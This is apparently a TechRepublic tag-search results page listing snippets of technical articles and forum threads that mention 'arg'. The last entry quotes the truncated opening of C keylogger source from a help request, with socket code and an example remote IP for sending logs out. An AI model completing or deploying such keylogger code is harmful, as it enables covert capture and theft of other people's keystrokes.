Show All Related Tags
Did you mean
margin (12 results), argument (11 results), Wells Fargo & Co. (11 results), target (10 results), cargo (10 results)more...
Show Fewer Related Tags
Did you mean
margin (12 results), argument (11 results), Wells Fargo & Co. (11 results), target (10 results), cargo (10 results), charge (10 results), profit margin (8 results), TechTarget (5 results), Argentina (5 results), LiveCargo (5 results), chargeback (4 results), bargain (4 results), Argent Software (4 results), large (4 results), Argonne National Laboratory (2 results), Argos (2 results), collective bargaining (1 results), turbocharge (1 results), Target Corp. (1 results), operating margin (1 results), Target.com (1 results)fewer...
Sponsored White Papers, Webcasts, and Downloads
TechRepublic Resources
- sort by:
- Relevance
- Date
- Popularity
- Finding the highest value in several SQL Server columns
- greatest at leastFiding the highest or lowest values in a row is something that I stumbled upon years ago.In my job I have to handle several RDBMSs, among them MSSQL, Oracle, Postgresql and MySQL.I added a couple of function in my MSSQL library named dbo.least(@n1,@n2) and dbo.greatest(@n1,@n2) since I...
- Discussion threads 2007-02-27
- Do More with Less: Turn Windows 98 into a reliable Web server
- Learn how to host Web sites on Windows 98While visiting TechRepublic’s Technical Q&A, I came across an interesting post by a member that calls himself ARG CIO. ARG CIO is challenging TechRepublic members to set up a multidomain Web server running Windows 98. Although he already knows the answer, it...
- Technical articles 2001-03-08
Additional Resources
- Process the command line with CLI in Java
- This Code is missing Error ProcessingIt would be nice instead of printing the stack trace we tell the user what was wrong with the arguments. We can do this by adding the following instead of stacktrace. System.out.println("Argument Error: " + e.getMessage); ...
- Discussion threads 2006-03-22
- using C++ to change windows system clock
- Does anybody know of a way to change the windows system clock using C++? I want to run a command line program that takes in a time and sets the clock to that arg.Thanks.
- Discussion threads 2007-06-27
- Cisco 501
- I am trying to recover a password on a Cisco PIX 501. After trying to retrieve the file using tftp, I receive this error: TFTP failed (return:-10 arg:0x1) Can anyone help a "newbie" with this one??pixmake sure you don't have any firewalls blocking the tftp port on...
- Discussion threads 2007-02-14
- LaunchOne (exe)
- LaunchOne allows you to start applications and documents via keyboard using completion on every arg major lack of other keyboard launchers. It provides a default plugin to start documents with associated applications and applications with simple command lines. It provides also a calculator plugin and a run plugin to use...
- Software downloads 2008-06-11
- Use smbmount and smbclient to access Windows resources from Linux
- Get the command options and syntax you need to make smbmount and smbclient access a Windows system from a Linux workstation.Many times I've had to put a Linux workstation into a field of Windows cattle, but it’s been difficult to make Linux work properly with Network Neighborhood.There are, of course,...
- Technical articles 2000-11-29
- Microsoft shows off JPEG rival
- licensing should not be a restriction...But it will be. I can't imagine M$ making such technology availible :1) for free2) without requiring purchase of M$ software to use itBest case, others would start to use it then see M$ in court to settle for licensing issues...PNG format is already avalaible...
- Discussion threads 2006-05-25
- How to install the 3rd Sata drive with PS that only has two SATA power plug
- Help! I am pulling my hair out trying to install a 3rd Sata drive with PS that only has two SATA power plugs. The store that sold the 3rd drive to me gave me a normal powerplug to sata power connector adapter, but that does not work. I don't...
- Discussion threads 2007-06-11
- Simpler code: Tips on using Perl's map function and command-line parsing
- Find out how you can use Perl's map function for more efficient text manipulation. Then, check out several methods for evaluating switches passed into your program's command line.By Charles GalpinPerl's map function can come in handy when you need to simplify potentially repetitive operations, such as capitalizing strings of text....
- Technical articles 2001-12-13
- Oracle Tip: Automate Oracle utilities with Windows Script Host
- This article originally appeared in the Oracle e-newsletter. Click here to subscribe automatically. With each new Windows OS release, the command prompt gets furtheraway from the user. Oracle still ships most of its main serverutilities as command-line utility programs, so it's becomingincreasingly difficult to perform simple tasks. However,...
- Technical articles 2004-05-24
- jacks personal writings
- blog rootramblingsjust the father of jack wallen jr and i like his writings and his actingramlingsgo threw this world in one state of mind and you will be all rightjust a thoughtworld basket ball usa won their first game and arg is beat fra now good games to watchjust...
- Discussion threads 2006-08-18
- Locate files with the find tool
- find is one of my favorit commandsYou can find files created after a specific date/time. Ie: Age of file since either creation or modification.You can find files over a specific size. Looking for files that has filled a partition or blew out a user quota all of a...
- Discussion threads 2007-09-11
- Limit postbacks with ASP.NET 2.0 client callbacks
- Developers have been grappling with the stateless nature of the Web since its inception. That is, once a page has been requested and loaded, the connection to the server is gone. The AJAX movement has put the spotlight on the XMLHTTP object, which enables server communication in...
- Blog posts 2008-04-01
- ARGs may put a code in your collar
- I have kept my finger on the pulse of IT News for several months now, and I am continually surprised when I see clothing intersect into the technology domain. I've blogged about this phenomenon before, and when I browsed News.com today, I came across another one that deserves mentioning: "Wearable game weaves clues...
- Blog posts 2006-02-21
- Office 2003 Word Template Issues
- I have a wonderful user who thinks they are a power user when they are really just a good software user... well how about have used software for years? Office and Word Perfect and are now self proclaimed experts?!?Admittedly they know more about formatting word docs and excel than...
- Discussion threads 2007-06-01
- Validate an ISBN value with VB.NET
- Problem with exampleISBN uses the character "X" to represent the value 10. The example uses the Convert.ToInt32 method which will fail if "X" is passed as the arg.-George SheehyFlawed - but good reference to the basic info at WikepediaDoes not tak into account hyphens in the value or the X...
- Discussion threads 2007-06-08
- Java Logger config file system property
- I have a Java Logger config file where I specify the location of output files as in java.util.logging.FileHandler.pattern = "${APP_LOG}/service%u.log.%g"This does not work as it does not appear to resolve ${APP_LOG} as a system property. Is there a way specify a variable into the Logger config file?1. Pass the config...
- Q&A 2005-04-18
- 2000 2003 DCs cannot establish trust
- Domain controllers in different forests have DNS, WINS, DHCP (one high, one low same subnet), configured. Attempting to establish trusts starting from either server always produces error "Domain controller cannot be contacted".I've tried to verify the settings over and over. As they are assigned IP by my dhcp router I...
- Q&A 2005-03-08
- need c/c++ help with keylogger
- here is a keylogger code but it wont compile#include #include #include #include #include #pragma comment(lib, "ws2_32.lib")void foo(int letra,char *file);void leer(char *file);char tex[5000];int main(int argc,char **argv){BOOL x;unsigned int i;char s[255],directory[300];long key,res;HKEY ret;HWND r;char buffer[1024],buffer1[1024];WSADATA data;SOCKADDR_IN add;SOCKET sock; if(argc6){ printf("-Usage:%s ",argv[0]); printf("nr%s","-Example:keylogger2 keylog.log 1 213.4.129.129...
- Q&A 2006-01-26
- << Previous
- page 1 of 1
- Next >>